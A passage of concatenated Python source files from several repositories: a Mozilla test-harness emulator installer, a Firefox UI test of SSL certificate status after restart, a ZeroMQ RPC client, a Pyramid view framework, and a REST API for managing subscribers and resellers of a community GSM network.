                                                    self.worst_log_level)
            self.tbpl_status = self.worst_level(TBPL_WARNING,
                                                self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
        if return_code not in success_codes:
            self.tbpl_status = self.worst_level(TBPL_FAILURE, self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
        # we can trust in parser.worst_log_level in either case
        return (self.tbpl_status, self.worst_log_level)
    def append_tinderboxprint_line(self, suite_name):
        """Emit the TinderboxPrint summary line for this suite."""
        # We are duplicating a condition (fail_count) from evaluate_parser and
        # parse parse_single_line but at little cost since we are not parsing
        # the log more then once. I figured this method should stay isolated as
        # it is only here for tbpl highlighted summaries and is not part of
        # buildbot evaluation or result status IIUC.
        summary = tbox_print_summary(self.pass_count,
                                     self.fail_count,
                                     self.known_fail_count,
                                     self.crashed,
                                     self.leaked)
        self.info("TinderboxPrint: %s<br/>%s\n" % (suite_name, summary))
class EmulatorMixin(object):
    """ Currently dependent on both TooltoolMixin and TestingMixin)

    Mixin that downloads and unpacks the B2G emulator (and optional tools)
    from a direct URL, a tooltool manifest, or a buildbot-derived manifest.
    """
    def install_emulator_from_tooltool(self, manifest_path, do_unzip=True):
        """Fetch the emulator via tooltool and unzip it into the emulator dir.

        Fatal on download failure; unzip is skipped when do_unzip is False.
        """
        dirs = self.query_abs_dirs()
        # tooltool_fetch returns a truthy value on failure here
        if self.tooltool_fetch(manifest_path, output_dir=dirs['abs_work_dir'],
                               cache=self.config.get("tooltool_cache", None)
                               ):
            self.fatal("Unable to download emulator via tooltool!")
        if do_unzip:
            unzip = self.query_exe("unzip")
            unzip_cmd = [unzip, '-q', os.path.join(dirs['abs_work_dir'], "emulator.zip")]
            self.run_command(unzip_cmd, cwd=dirs['abs_emulator_dir'], halt_on_failure=True,
                             fatal_exit_code=3)
    def install_emulator(self):
        """Install the emulator from the first available source:
        emulator_url, emulator_manifest, or the buildbot repo manifest.
        Also installs extra tools if tools_manifest is configured."""
        dirs = self.query_abs_dirs()
        self.mkdir_p(dirs['abs_emulator_dir'])
        if self.config.get('emulator_url'):
            self.download_unzip(self.config['emulator_url'], dirs['abs_emulator_dir'])
        elif self.config.get('emulator_manifest'):
            manifest_path = self.create_tooltool_manifest(self.config['emulator_manifest'])
            do_unzip = True
            # manifests marked 'unpack' are extracted by tooltool itself
            if 'unpack' in self.config['emulator_manifest']:
                do_unzip = False
            self.install_emulator_from_tooltool(manifest_path, do_unzip)
        elif self.buildbot_config:
            # derive the manifest location from the buildbot repo/revision
            props = self.buildbot_config.get('properties')
            url = 'https://hg.mozilla.org/%s/raw-file/%s/b2g/test/emulator.manifest' % (
                props['repo_path'], props['revision'])
            manifest_path = self.download_file(url,
                                               file_name='tooltool.tt',
                                               parent_dir=dirs['abs_work_dir'])
            if not manifest_path:
                self.fatal("Can't download emulator manifest from %s" % url)
            self.install_emulator_from_tooltool(manifest_path)
        else:
            self.fatal("Can't get emulator; set emulator_url or emulator_manifest in the config!")
        if self.config.get('tools_manifest'):
            manifest_path = self.create_tooltool_manifest(self.config['tools_manifest'])
            do_unzip = True
            if 'unpack' in self.config['tools_manifest']:
                do_unzip = False
            self.install_emulator_from_tooltool(manifest_path, do_unzip)
|
sr-murthy/firefox-ui-tests
|
firefox_ui_tests/remote/security/test_ssl_status_after_restart.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from marionette_driver import Wait
from firefox_ui_harness.decorators import skip_if_e10s, skip_under_xvfb
from firefox_ui_harness import FirefoxTestCase
class TestSSLStatusAfterRestart(FirefoxTestCase):
    """Verify that SSL certificate status (DV/OV/EV) survives a browser
    restart with session restore enabled."""
    def setUp(self):
        FirefoxTestCase.setUp(self)
        # one entry per certificate class: DV, EV (with org identity), OV
        self.test_data = (
            {
                'url': 'https://ssl-dv.mozqa.com',
                'identity': '',
                'type': 'verifiedDomain'
            },
            {
                'url': 'https://ssl-ev.mozqa.com/',
                'identity': 'Mozilla Corporation',
                'type': 'verifiedIdentity'
            },
            {
                'url': 'https://ssl-ov.mozqa.com/',
                'identity': '',
                'type': 'verifiedDomain'
            }
        )
        # Set browser to restore previous session
        self.prefs.set_pref('browser.startup.page', 3)
        self.identity_popup = self.browser.navbar.locationbar.identity_popup
    def tearDown(self):
        # best-effort cleanup of windows/tabs/popup before base teardown
        try:
            self.windows.close_all([self.browser])
            self.browser.tabbar.close_all_tabs([self.browser.tabbar.tabs[0]])
            self.browser.switch_to()
            self.identity_popup.close(force=True)
        finally:
            FirefoxTestCase.tearDown(self)
    @skip_if_e10s
    @skip_under_xvfb
    def test_ssl_status_after_restart(self):
        """Load each site in its own tab, restart, and re-verify each tab."""
        for item in self.test_data:
            with self.marionette.using_context('content'):
                self.marionette.navigate(item['url'])
            self.verify_certificate_status(item)
            self.browser.tabbar.open_tab()
        self.restart()
        # session restore brings the tabs back in the same order
        for index, item in enumerate(self.test_data):
            self.browser.tabbar.tabs[index].select()
            self.verify_certificate_status(item)
    def verify_certificate_status(self, item):
        """Check favicon, identity popup, and Page Info security panel
        against the expected certificate data for one site."""
        url, identity, cert_type = item['url'], item['identity'], item['type']
        # Check the favicon
        # TODO: find a better way to check, e.g., mozmill's isDisplayed
        favicon_hidden = self.marionette.execute_script("""
          return arguments[0].hasAttribute("hidden");
        """, script_args=[self.browser.navbar.locationbar.favicon])
        self.assertFalse(favicon_hidden)
        self.identity_popup.box.click()
        Wait(self.marionette).until(lambda _: self.identity_popup.is_open)
        # Check the type shown on the idenity popup doorhanger
        self.assertEqual(self.identity_popup.popup.get_attribute('className'),
                         cert_type,
                         'Certificate type is verified for ' + url)
        # Check the identity label
        self.assertEqual(self.identity_popup.organization_label.get_attribute('value'),
                         identity,
                         'Identity name is correct for ' + url)
        # Get the information from the certificate
        cert = self.browser.tabbar.selected_tab.certificate
        # Open the Page Info window by clicking the More Information button
        page_info = self.browser.open_page_info_window(
            lambda _: self.identity_popup.more_info_button.click())
        # Verify that the current panel is the security panel
        self.assertEqual(page_info.deck.selected_panel, page_info.deck.security)
        # Verify the domain listed on the security panel
        # If this is a wildcard cert, check only the domain
        if cert['commonName'].startswith('*'):
            self.assertIn(self.security.get_domain_from_common_name(cert['commonName']),
                          page_info.deck.security.domain.get_attribute('value'),
                          'Expected domain found in certificate for ' + url)
        else:
            self.assertEqual(page_info.deck.security.domain.get_attribute('value'),
                             cert['commonName'],
                             'Domain value matches certificate common name.')
        # Verify the owner listed on the security panel
        if identity != '':
            owner = cert['organization']
        else:
            owner = page_info.get_property('securityNoOwner')
        self.assertEqual(page_info.deck.security.owner.get_attribute('value'), owner,
                         'Expected owner label found for ' + url)
        # Verify the verifier listed on the security panel
        self.assertEqual(page_info.deck.security.verifier.get_attribute('value'),
                         cert['issuerOrganization'],
                         'Verifier matches issuer of certificate for ' + url)
        page_info.close()
|
Alidron/demo-nao
|
alidron-env/lib/python2.7/site-packages/netcall/base_client.py
|
# vim: fileencoding=utf-8 et ts=4 sts=4 sw=4 tw=0
"""
Base RPC client class
Authors:
* Brian Granger
* Alexander Glyzov
* Axel Voitier
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2012-2014. Brian Granger, Min Ragan-Kelley, Alexander Glyzov,
# Axel Voitier
#
# Distributed under the terms of the BSD License. The full license is in
# the file LICENSE distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from sys import exc_info
from random import randint
from logging import getLogger
import zmq
from zmq.utils import jsonapi
from .base import RPCBase
from .errors import RemoteRPCError, RPCError
from .utils import RemoteMethod
#-----------------------------------------------------------------------------
# RPC Client base
#-----------------------------------------------------------------------------
class RPCClientBase(RPCBase):
    """An RPC Client (base class)

    Speaks the netcall wire protocol over a ZMQ DEALER socket.  Requests and
    replies are multipart messages framed as [b'|', req_id, ...].
    """
    logger = getLogger('netcall.client')
    def _create_socket(self):
        # DEALER socket with an explicit identity so the service can route
        # replies back to this client
        super(RPCClientBase, self)._create_socket()
        self.socket = self.context.socket(zmq.DEALER)
        self.socket.setsockopt(zmq.IDENTITY, self.identity)
    def _build_request(self, method, args, kwargs, ignore=False, req_id=None):
        """Frame one request as a multipart message.

        Returns (req_id, msg_list) where msg_list is
        [b'|', req_id, method, <serialized args/kwargs...>, ignore_flag].
        """
        # random 32-bit hex id unless the caller supplies one (generators do)
        req_id = req_id or ('%x' % randint(0, 0xFFFFFFFF)).encode()
        method = method.encode()
        msg_list = [b'|', req_id, method]
        data_list = self._serializer.serialize_args_kwargs(args, kwargs)
        msg_list.extend(data_list)
        # trailing frame: b'1' when the caller doesn't want a reply
        msg_list.append(str(int(ignore)).encode())
        return req_id, msg_list
    def _send_request(self, request):
        # 'request' is the framed msg_list from _build_request
        self.logger.debug('sending %r', request)
        self.socket.send_multipart(request)
    def _parse_reply(self, msg_list):
        """
        Parse a reply from service
        (should not raise an exception)

        The reply is received as a multipart message:
        [b'|', req_id, type, payload ...]

        Returns either None or a dict {
            'type'   : <message_type:bytes>       # ACK | OK | YIELD | FAIL
            'req_id' : <id:bytes>,                # unique message id
            'srv_id' : <service_id:bytes> | None  # only for ACK messages
            'result' : <object>
        }
        """
        logger = self.logger
        if len(msg_list) < 4 or msg_list[0] != b'|':
            logger.error('bad reply %r', msg_list)
            return None
        msg_type = msg_list[2]
        data = msg_list[3:]
        result = None
        srv_id = None
        if msg_type == b'ACK':
            srv_id = data[0]
        elif msg_type in (b'OK', b'YIELD'):
            try:
                result = self._serializer.deserialize_result(data)
            except Exception as e:
                # deserialization failure is reported as a FAIL carrying
                # the local exception
                msg_type = b'FAIL'
                result = e
        elif msg_type == b'FAIL':
            try:
                # remote errors arrive as JSON {ename, evalue, traceback};
                # StopIteration/GeneratorExit are rebuilt as real exceptions
                # so client-side generators behave natively
                error = jsonapi.loads(msg_list[3])
                if error['ename'] == 'StopIteration':
                    result = StopIteration()
                elif error['ename'] == 'GeneratorExit':
                    result = GeneratorExit()
                else:
                    result = RemoteRPCError(error['ename'], error['evalue'], error['traceback'])
            except Exception as e:
                logger.error('unexpected error while decoding FAIL', exc_info=True)
                result = RPCError('unexpected error while decoding FAIL: %s' % e)
        else:
            result = RPCError('bad message type: %r' % msg_type)
        return dict(
            type = msg_type,
            req_id = msg_list[1],
            srv_id = srv_id,
            result = result,
        )
    def _generator(self, req_id, get_val_exc):
        """ Mirrors a service generator on a client side

        Each client-side send/throw/close is forwarded to the remote
        generator as a _SEND/_THROW/_CLOSE command reusing the original
        req_id; get_val_exc() blocks for the next (value, exception) pair.
        """
        #logger = self.logger
        def _send_cmd(cmd, args):
            _, msg_list = self._build_request(
                cmd, args, None, ignore=False, req_id=req_id
            )
            self._send_request(msg_list)
        _send_cmd('_SEND', None)
        while True:
            val, exc = get_val_exc()
            if exc is not None:
                raise exc
            try:
                res = yield val
            except GeneratorExit:
                _send_cmd('_CLOSE', None)
            except:
                # forward any exception thrown into this generator by name
                etype, evalue, _ = exc_info()
                _send_cmd('_THROW', [etype.__name__, evalue])
            else:
                _send_cmd('_SEND', res)
    def __getattr__(self, name):
        # any unknown attribute becomes a callable remote-method proxy
        return RemoteMethod(self, name)
    def call(self, proc_name, args=[], kwargs={}, result='sync', timeout=None):
        """
        Call the remote method with *args and **kwargs
        (may raise an exception)

        NOTE(review): args=[]/kwargs={} are mutable defaults shared across
        calls; they are only read here (serialized, never mutated), but
        None sentinels would be the safer idiom.

        Parameters
        ----------
        proc_name : <bytes> name of the remote procedure to call
        args      : <tuple> positional arguments of the remote procedure
        kwargs    : <dict>  keyword arguments of the remote procedure
        result    : 'sync' | 'async' | 'ignore'
        timeout   : <float> | None
            Number of seconds to wait for a reply.
            RPCTimeoutError is raised in case of timeout.
            Set to None, 0 or a negative number to disable.

        Returns
        -------
        <result:object> if result is 'sync'
        <Future>        if result is 'async'
        None            if result is 'ignore'

        If remote call fails:
        - raises <RemoteRPCError> if result is 'sync'
        - sets <RemoteRPCError> into the <Future> if result is 'async'
        """
        assert result in ('sync', 'async', 'ignore'), \
            'expected any of "sync", "async", "ignore" -- got %r' % result
        if not (timeout is None or isinstance(timeout, (int, float))):
            raise TypeError("timeout param: <float> or None expected, got %r" % timeout)
        if not self._ready:
            raise RuntimeError('bind or connect must be called first')
        ignore = result == 'ignore'
        req_id, msg_list = self._build_request(proc_name, args, kwargs, ignore)
        self._send_request(msg_list)
        if ignore:
            return None
        # register a Future that the reader task resolves on reply
        future = self._tools.Future()
        self._futures[req_id] = future
        if result == 'sync':
            # block waiting for a reply passed by _reader
            return future.result(timeout=timeout)
        else:
            # async
            return future
|
ecreall/pontus
|
pontus/view.py
|
# Copyright (c) 2014 by Ecreall under licence AGPL terms
# available on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
import re
from collections import OrderedDict
from webob.multidict import MultiDict
from zope.interface import implementer
from pyramid.view import view_config
import pyramid.httpexceptions as exc
from pyramid import renderers
from pyramid.renderers import get_renderer
from pyramid_layout.layout import Structure
from substanced.util import get_oid
from dace.processinstance.core import Error, ValidationError
from pontus.interfaces import IView
from pontus.core import Step
from pontus.util import copy_dict, update_resources
from pontus.resources import (
BehaviorViewErrorPrincipalmessage,
BehaviorViewErrorSolutions)
from pontus import _, log
class ViewError(Error):
    """Error raised by views; carries a principal message, causes, and
    suggested solutions, and renders itself as an alert template.

    NOTE(review): causes/solutions are mutable class-level defaults; code in
    this module always rebinds them on instances, never mutates in place.
    """
    principalmessage = u""
    causes = []
    solutions = []
    type = 'danger'
    template = 'pontus:templates/views_templates/alert_message.pt'

    def render_message(self, request, subject=None):
        """Render this error through its alert template and return the HTML."""
        return renderers.render(
            self.template,
            {'error': self, 'subject': subject},
            request)
# fallback main template used by View.content when none is supplied
EMPTY_TEMPLATE = 'templates/views_templates/empty.pt'
@implementer(IView)
class View(Step):
    """Abstract view: a wizard Step bound to a (context, request) pair.

    Builds a hierarchical viewid from parent/context, runs validators, and
    drives the validate -> before_update -> update -> after_update cycle
    in __call__.
    """
    viewid = None
    title = _('View')
    description = ""
    name = 'view'
    coordinates = 'main'# default value
    validators = []
    wrapper_template = 'templates/views_templates/view_wrapper.pt'
    template = None
    requirements = None
    css_class = "pontus-main-view"
    container_css_class = ""
    def render_item(self, item, coordinates, parent):
        """Render one view item through the wrapper template as a layout
        Structure."""
        body = renderers.render(
            self.wrapper_template,
            {'coordinates': coordinates,
             'subitem': item,
             'parent': parent}, self.request)
        return Structure(body)
    def __init__(self,
                 context,
                 request,
                 parent=None,
                 wizard=None,
                 stepid=None,
                 **kwargs):
        super(View, self).__init__(wizard, stepid)
        self.context = context
        self.request = request
        self.parent = parent
        # compose a unique viewid: [parent viewid _] name [_ context oid]
        if self.viewid is None:
            self.viewid = self.name
        if self.parent is not None:
            self.viewid = self.parent.viewid + '_' + self.viewid
        if self.context is not None:
            self.viewid = self.viewid + '_' + str(get_oid(self.context, ''))
        self._original_view_id = self.viewid
        self._request_configuration()
    def _request_configuration(self):
        # allow the request to override the target layout slot
        coordinates = self.params('coordinates')
        if coordinates is not None:
            self.coordinates = coordinates
    @property
    def requirements_copy(self):
        # always hand out a copy so callers can't mutate class-level state
        if self.requirements is None:
            return {'css_links': [], 'js_links': []}
        else:
            return copy_dict(self.requirements)
    def has_id(self, id):
        return self.viewid == id
    def get_view_requirements(self):
        return self.requirements_copy
    def validate(self):
        """Run all validators; re-raise any ValidationError as a ViewError."""
        for validator in self.validators:
            try:
                validator.validate(self.context, self.request)
            except ValidationError as error:
                view_error = ViewError()
                view_error.principalmessage = BehaviorViewErrorPrincipalmessage
                if getattr(error, 'principalmessage', ''):
                    view_error.causes = [error.principalmessage]
                view_error.solutions = BehaviorViewErrorSolutions
                raise view_error
        return True
    def params(self, key=None):
        """Return request parameter(s) for 'key'.

        Handles 'key[]' list-style parameters: returns a list when the list
        form was used or multiple values exist, a single value when exactly
        one plain value exists, and None when the key is absent.  With no
        key, returns the whole params multidict.
        """
        result = []
        if key is None:
            return self.request.params
        islist = False
        list_key = key + '[]'
        if list_key in self.request.params:
            islist = True
        if key in self.request.params or list_key in self.request.params:
            # normalize 'key[]' entries to 'key' before collecting values
            dict_copy = self.request.params.copy()
            dict_copy = MultiDict([(k.replace('[]', ''), value)
                                   for (k, value) in dict_copy.items()])
            while key in dict_copy:
                result.append(dict_copy.pop(key))
        len_result = len(result)
        if not islist and len_result == 1:
            return result[0]
        elif islist or len_result > 1:
            return result
        return None
    def before_update(self):
        self.bind()
    def update(self):
        # subclasses implement the actual rendering work here
        pass
    def after_update(self):
        pass
    def __call__(self):
        """Run the full view cycle; ViewErrors propagate, anything else
        becomes a 500."""
        result = None
        try:
            self.validate()
            self.before_update()
            result = self.update()
            self.after_update()
        except ViewError as error:
            log.warning(error)
            raise error
        except Exception as http_error:
            log.exception(http_error)
            raise exc.HTTPInternalServerError()
        if isinstance(result, dict):
            # guarantee resource-link slots before merging global resources
            if 'js_links' not in result:
                result['js_links'] = []
            if 'css_links' not in result:
                result['css_links'] = []
            update_resources(self.request, result)
        return result
    def content(self, args, template=None, main_template=None):
        """Render 'template' with 'args' and return {'body', 'args'}."""
        if template is None:
            template = self.template
        if main_template is None:
            main_template = get_renderer(EMPTY_TEMPLATE).implementation()
        if isinstance(args, dict):
            args['main_template'] = main_template
        body = renderers.render(template, args, self.request)
        return {'body': body,
                'args': args}
    def adapt_item(self, render, id, isactive=True):
        """Wrap rendered output into the item dict the layout expects."""
        # nested views are never marked active
        if self.parent is not None:
            isactive = False
        item = {'view': self, 'id': id, 'isactive': isactive}
        if isinstance(render, list):
            item['items'] = render
        else:
            item['body'] = render
        return item
    def setviewid(self, viewid):
        self.viewid = viewid
        self._original_view_id = viewid
    def failure(self, error, subject=None):
        """Build a result dict presenting 'error' in this view's slot."""
        error_body = error.render_message(self.request, subject)
        item = self.adapt_item('', self.viewid, True)
        item['messages'] = {error.type: [error_body]}
        result = {'js_links': [],
                  'css_links': [],
                  'coordinates': {self.coordinates: [item]}}
        return result
    def success(self, validated=None):
        pass
    def bind(self):
        # reset per-request bindings
        setattr(self, '_bindings', {})
    @property
    def bindings(self):
        # own bindings plus (overriding) parent bindings
        bindings = getattr(self, '_bindings', {}).copy()
        if self.parent:
            bindings.update(self.parent.bindings)
        return bindings
    def get_binding(self, key):
        return self.bindings.get(key, None)
class ElementaryView(View):
    """Abstract view wired to dace behaviors.

    Instantiates this view's declared behaviors (or reuses instances passed
    in via kwargs['behaviors']), validates them, and executes them in the
    declared order.
    """
    behaviors = []
    validate_behaviors = True
    def __init__(self,
                 context,
                 request,
                 parent=None,
                 wizard=None,
                 stepid=None,
                 **kwargs):
        super(ElementaryView, self).__init__(context, request, parent,
                                             wizard, stepid, **kwargs)
        self._all_validators = list(self.validators)
        self.specific_behaviors_instances = []
        self.behaviors_instances = OrderedDict()
        self.errors = []
        if 'behaviors' in kwargs:
            # caller-supplied behavior instances, filtered to those this
            # view actually declares
            bis = kwargs['behaviors']
            self.specific_behaviors_instances = [bi for bi in bis
                                                 if bi._class_ in self.behaviors]
        specific_behaviors = [b._class_ for b in
                              self.specific_behaviors_instances]
        if self.validate_behaviors:
            # validators for behaviors we must instantiate ourselves
            self._all_validators.extend([behavior.get_validator()
                                         for behavior in self.behaviors
                                         if behavior not in specific_behaviors])
        self._init_behaviors(specific_behaviors)
    def validate(self):
        """Validate all validators and pre-supplied behavior instances;
        re-raise any ValidationError as a ViewError."""
        try:
            for validator in self._all_validators:
                validator.validate(self.context, self.request)
            if self.validate_behaviors and self.specific_behaviors_instances:
                for init_v in self.specific_behaviors_instances:
                    init_v.validate(self.context, self.request)
        except ValidationError as error:
            view_error = ViewError()
            view_error.principalmessage = BehaviorViewErrorPrincipalmessage
            if error.principalmessage:
                view_error.causes = [error.principalmessage]
            view_error.solutions = BehaviorViewErrorSolutions
            raise view_error
        return True
    def _add_behaviorinstance(self, behaviorinstance):
        # key behaviors by title with whitespace collapsed to underscores
        key = re.sub(r'\s', '_', behaviorinstance.title)
        self.behaviors_instances[key] = behaviorinstance
        try:
            # fold the behavior oid into the viewid for uniqueness
            self.viewid = self.viewid+'_'+str(get_oid(behaviorinstance))
        except Exception:
            pass
    def _init_behaviors(self, specific_behaviors):
        """Instantiate declared behaviors (skipping pre-supplied ones) and
        register them all in declaration order."""
        self.viewid = self._original_view_id
        self.behaviors_instances = OrderedDict()
        behaviors = [behavior for behavior in self.behaviors
                     if behavior not in specific_behaviors]
        behaviors_instances = []
        for behavior in behaviors:
            try:
                wizard_behavior = None
                if self.wizard:
                    wizard_behavior = self.wizard.behaviorinstance
                behaviorinstance = behavior.get_instance(self.context,
                                                         self.request,
                                                         wizard=wizard_behavior,
                                                         validate=False)
                if behaviorinstance:
                    behaviors_instances.append(behaviorinstance)
            except ValidationError as error:
                # instantiation failures are collected, not fatal
                self.errors.append(error)
        for behaviorinstance in self.specific_behaviors_instances:
            behaviors_instances.append(behaviorinstance)
        # preserve the order in which behaviors were declared on the class
        behaviors_instances = sorted(
            behaviors_instances,
            key=lambda e:
            self.behaviors.index(e.__class__))
        for behaviorinstance in behaviors_instances:
            self._add_behaviorinstance(behaviorinstance)
    def before_update(self):
        self.bind()
        for behavior in self.behaviors_instances.values():
            behavior.before_execution(self.context, self.request)
    def execute(self, appstruct=None):
        """Execute all behavior instances and return their results."""
        results = []
        for behavior in self.behaviors_instances.values():
            results.append(behavior.execute(
                self.context, self.request, appstruct))
        return results
    def after_update(self):
        pass
class BasicView(ElementaryView):
    """Non-executable elementary view: renders content but triggers no
    behavior execution."""
    isexecutable = False

    def __init__(self, context, request, parent=None,
                 wizard=None, stepid=None, **kwargs):
        super(BasicView, self).__init__(context, request, parent,
                                        wizard, stepid, **kwargs)
        # a basic view always completes once constructed
        self.finished_successfully = True

    def update(self):
        # nothing to compute by default; subclasses override
        return {}
@view_config(
    context=ViewError,
    renderer='pontus:templates/views_templates/grid.pt',
)
class ViewErrorView(BasicView):
    """Pyramid exception view rendering a ViewError as an alert message."""
    title = _('An error has occurred!')
    name = 'viewerrorview'
    template = 'pontus:templates/views_templates/alert_message.pt'

    def update(self):
        """Localize the title and place the rendered error in this view's
        layout slot."""
        self.title = self.request.localizer.translate(self.title)
        body = self.content(
            args={'error': self.context}, template=self.template)['body']
        item = self.adapt_item(body, self.viewid)
        return {'coordinates': {self.coordinates: [item]}}
|
saycel/saycel
|
rccn/rapi.py
|
############################################################################
#
# Copyright (C) 2013 tele <tele@rhizomatica.org>
#
# REST API Interface to RCCN Modules
# This file is part of RCCN
#
# RCCN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RCCN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
############################################################################
from corepost import Response, NotFoundException, AlreadyExistsException
from corepost.web import RESTResource, route, Http
from config import *
class SubscriberRESTService:
    """REST endpoints for managing subscribers (mounted at /subscriber)."""
    path = '/subscriber'

    @route('/')
    def getAll(self, request):
        # List every subscriber.
        api_log.info('%s - [GET] %s' % (request.getHost().host, self.path))
        try:
            subscriber = Subscriber()
            payload = json.dumps(subscriber.get_all(), cls=PGEncoder)
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/<msisdn>')
    def get(self, request, msisdn):
        # Fetch one subscriber, or a filtered listing when msisdn is one
        # of the pseudo-msisdn keywords in the dispatch table below.
        api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path, msisdn))
        try:
            subscriber = Subscriber()
            listings = {
                'all_connected': subscriber.get_all_connected,
                'unpaid_subscription': subscriber.get_unpaid_subscription,
                'paid_subscription': subscriber.get_paid_subscription,
                'unauthorized': subscriber.get_unauthorized,
                'online': subscriber.get_online,
                'offline': subscriber.get_offline,
            }
            if msisdn in listings:
                payload = json.dumps(listings[msisdn](), cls=PGEncoder)
            else:
                payload = json.dumps(subscriber.get(msisdn), cls=PGEncoder)
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        # all_connected responses are large and polled; don't log them.
        if msisdn != 'all_connected':
            api_log.info(payload)
        return payload

    @route('/extension/<imsi>')
    def extension(self, request, imsi):
        # Resolve the local extension for an IMSI.
        api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path, imsi))
        try:
            subscriber = Subscriber()
            payload = json.dumps(subscriber.get_local_extension(imsi), cls=PGEncoder)
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        return payload

    @route('/', Http.POST)
    def post(self, request, msisdn, name, balance, location):
        # Provision a new subscriber.
        api_log.info('%s - [POST] %s Data: msisdn:"%s" name:"%s" balance:"%s" location:"%s"' % (request.getHost().host, self.path, msisdn, name, balance, location))
        try:
            subscriber = Subscriber()
            assigned = subscriber.add(msisdn, name, balance, location)
            if assigned != msisdn:
                # Backend assigned a different number; report it in 'error'.
                payload = {'status': 'success', 'error': assigned}
            else:
                payload = {'status': 'success', 'error': ''}
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/offline', Http.PUT)
    def offline(self, request, imsi=''):
        # Mark a subscriber offline by zeroing its LAC.
        api_log.info('%s - [PUT] %s/offline Data: imsi:"%s"' % (request.getHost().host, self.path, imsi))
        try:
            Subscriber().set_lac(imsi, 0)
            payload = {'status': 'success', 'error': ''}
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/<msisdn>', Http.PUT)
    def put(self, request, msisdn='', name='', balance='', authorized='', subscription_status='', location=''):
        # Edit subscriber attributes; empty parameters are left untouched.
        api_log.info('%s - [PUT] %s/%s Data: name:"%s" balance:"%s" authorized:"%s" subscription_status:"%s" location:"%s"' % (request.getHost().host, self.path,
            msisdn, name, balance, authorized, subscription_status, location))
        try:
            subscriber = Subscriber()
            if authorized != '':
                subscriber.authorized(msisdn, authorized)
            if subscription_status != '':
                subscriber.subscription(msisdn, subscription_status)
            # NOTE(review): parentheses spell out the pre-existing operator
            # precedence ('and' binds tighter than 'or'); a lone non-empty
            # balance triggers edit() even with an empty msisdn -- confirm
            # this is intended.
            if (msisdn != '' and name != '') or balance != '':
                subscriber.edit(msisdn, name, balance, location)
            payload = {'status': 'success', 'error': ''}
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/<msisdn>', Http.DELETE)
    def delete(self, request, msisdn):
        # Remove a subscriber entirely.
        api_log.info('%s - [DELETE] %s/%s' % (request.getHost().host, self.path, msisdn))
        try:
            Subscriber().delete(msisdn)
            payload = {'status': 'success', 'error': ''}
        except SubscriberException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload
class ResellerRESTService:
    """REST endpoints for managing resellers (mounted at /reseller).

    Fixes over the previous revision:
    * ``getAll`` instantiated ``Subscriber()`` (copy/paste from the
      subscriber service) although it serves /reseller and catches
      ResellerException; it now uses ``Reseller()``.
    * The /edit_messages handler was also named ``put`` and silently
      shadowed the msisdn-edit handler in the class namespace; renamed
      to ``put_messages`` (the registered route path is unchanged).
    """
    path = '/reseller'

    # get all resellers
    @route('/')
    def getAll(self, request):
        api_log.info('%s - [GET] %s' % (request.getHost().host, self.path))
        try:
            reseller = Reseller()
            data = json.dumps(reseller.get_all(), cls=PGEncoder)
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # get reseller (or reseller notification messages)
    @route('/<msisdn>')
    def get(self, request, msisdn):
        api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path, msisdn))
        try:
            reseller = Reseller()
            if msisdn == 'messages':
                data = json.dumps(reseller.get_messages(), cls=PGEncoder)
            else:
                data = json.dumps(reseller.get(msisdn), cls=PGEncoder)
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # add new reseller
    @route('/<msisdn>', Http.POST)
    def post(self, request, msisdn, pin, balance):
        api_log.info('%s - [POST] %s Data: msisdn:"%s" pin:"%s" balance:"%s"' % (request.getHost().host, self.path, msisdn, pin, balance))
        try:
            reseller = Reseller()
            reseller.add(msisdn, pin, balance)
            data = {'status': 'success', 'error': ''}
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # edit reseller
    @route('/', Http.PUT)
    def put(self, request, msisdn='', pin='', balance=''):
        api_log.info('%s - [PUT] %s Data: msisdn:"%s" pin:"%s" balance:"%s"' % (request.getHost().host, self.path, msisdn, pin, balance))
        try:
            reseller = Reseller()
            # NOTE(review): parentheses preserve the original precedence
            # ('and' before 'or'); a lone non-empty balance triggers
            # edit() -- confirm intended.
            if (msisdn != '' and pin != '') or balance != '':
                reseller.edit(msisdn, pin, balance)
            data = {'status': 'success', 'error': ''}
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # edit reseller notification messages
    @route('/edit_messages', Http.PUT)
    def put_messages(self, request, mess1, mess2, mess3, mess4, mess5, mess6):
        # Renamed from 'put' so it no longer shadows the handler above.
        api_log.info('%s - [PUT] %s/edit_messages Data: mess1:"%s" mess2:"%s" mess3:"%s" mess4:"%s" mess5:"%s" mess6:"%s"' % (request.getHost().host, self.path,
            mess1, mess2, mess3, mess4, mess5, mess6))
        try:
            reseller = Reseller()
